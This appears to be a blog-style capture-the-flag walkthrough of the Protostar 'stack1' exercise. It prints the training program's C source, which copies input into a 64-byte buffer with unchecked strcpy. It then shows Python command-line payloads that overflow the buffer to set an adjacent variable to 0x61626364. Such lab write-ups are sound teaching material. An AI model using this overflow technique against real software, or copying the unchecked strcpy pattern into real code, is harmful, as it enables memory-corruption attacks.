We start off with understanding what is being asked of us:
Additionally, we check out the stack1.c source code:
#include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> int main(int argc, char **argv) { volatile int modified; char buffer[64]; if(argc == 1) { errx(1, "please specify an argument\n"); } modified = 0; strcpy(buffer, argv[1]); if(modified == 0x61626364) { printf("you have correctly got the variable to the right value\n"); } else { printf("Try again, you got 0x%08x\n", modified); } }
Okay, looking at the code, we need to fill the buffer and modify the variable "modified" to represent the value 0x61626364.
To accomplish this, we first need to overflow the buffer with 64 bytes:
$ ./stack1 $(python -c 'print "A" * 64') Try again, you got 0x00000000 $ ./stack1 $(python -c 'print "A" * 65') Try again, you got 0x00000041 $
We notice that after sending 65 bytes, we start to fill our response. It looks like 64 is our buffer, but everything beyond will fill up our response.
Let's test another theory by adding the letter B 4 more times after our 64 bytes:
$ ./stack1 $(python -c 'print "A" * 64 + "B" * 4') Try again, you got 0x42424242 $
Excellent! Now we need to thoroughly understand what is asked for us in this program.
After filling our modified variable (buffer) past 64, we start to fill up its value. Currently, its value is 42424242. However, we need to have it read 0x61626364. Since we are already told this is in little endian, we will need to read its notation in reverse. It will actually read \x64\x63\x62\x61.
Let's update our payload:
$ ./stack1 $(python -c 'print "A" * 64 + "\x64\x63\x62\x61"') you have correctly got the variable to the right value $
Success!
Thanks for reading.
-geoda